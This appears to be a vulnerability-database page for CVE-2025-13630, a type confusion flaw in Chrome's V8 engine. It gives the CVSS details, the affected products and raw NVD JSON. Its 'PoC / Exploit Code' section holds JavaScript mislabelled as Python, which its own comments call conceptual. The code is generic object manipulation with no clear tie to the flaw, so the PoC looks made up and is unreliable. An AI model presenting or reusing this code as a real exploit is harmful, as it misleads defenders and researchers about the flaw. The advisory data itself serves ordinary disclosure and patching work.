Security Vulnerability Report
中文
CVE-2025-13630 CVSS 8.8 HIGH

CVE-2025-13630

Published: 2025-12-02 19:15:47
Last Modified: 2025-12-04 19:59:59

Description

Type Confusion in V8 in Google Chrome prior to 143.0.7499.41 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Google Chrome < 143.0.7499.41
Chromium-based browsers using V8 engine < 143.0.7499.41
Microsoft Edge (Chromium-based) with affected V8 version
Opera with affected V8 version
Brave with affected V8 version

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-13630 PoC - V8 Type Confusion // This is a conceptual PoC demonstrating the type confusion attack pattern // Actual exploitation requires specific V8 version and environment function triggerTypeConfusion() { // Create initial object with specific type let obj = { x: 1.1, y: 2.2 }; // Force V8 to optimize this pattern for (let i = 0; i < 10000; i++) { obj.x = i; } // Type confusion trigger - modify object's hidden class // This pattern may cause V8 to misoptimize type assumptions obj.z = 3.3; // Use polymorphic behavior to trigger confusion function confuse(a, b) { return a.x + b.y; } // Trigger with different types confuse(obj, { x: 'string', y: 2.2 }); confuse(obj, [1, 2, 3]); // Force deoptimization confuse(obj, { x: Symbol(), y: 2.2 }); return obj; } // Heap corruption trigger function triggerHeapCorruption() { const buffer = new ArrayBuffer(0x1000); const view = new Float64Array(buffer); // Create objects that may share memory regions let objects = []; for (let i = 0; i < 100; i++) { objects.push({ value: i }); } // Trigger GC to create heap layout suitable for corruption triggerTypeConfusion(); return view; } // Execute try { triggerTypeConfusion(); triggerHeapCorruption(); } catch (e) { console.log('Error: ' + e.message); } console.log('PoC executed - upgrade Chrome to 143.0.7499.41 or later');

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13630", "sourceIdentifier": "[email protected]", "published": "2025-12-02T19:15:46.710", "lastModified": "2025-12-04T19:59:59.043", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Type Confusion in V8 in Google Chrome prior to 143.0.7499.41 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)"}, {"lang": "es", "value": "Confusión de tipos en V8 en Google Chrome versiones anteriores a 143.0.7499.41 permitió a un atacante remoto potencialmente explotar la corrupción de memoria heap mediante una página HTML manipulada. (Gravedad de seguridad de Chromium: Alta)"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-843"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "143.0.7499.40", "matchCriteriaId": "28874374-C1B5-4638-BCCD-0AC4F1DAA6EC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "143.0.7499.40", "matchCriteriaId": "28874374-C1B5-4638-BCCD-0AC4F1DAA6EC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://chromereleases.googleblog.com/2025/12/stable-channel-update-for-desktop.html", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://issues.chromium.org/issues/456547591", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}]}}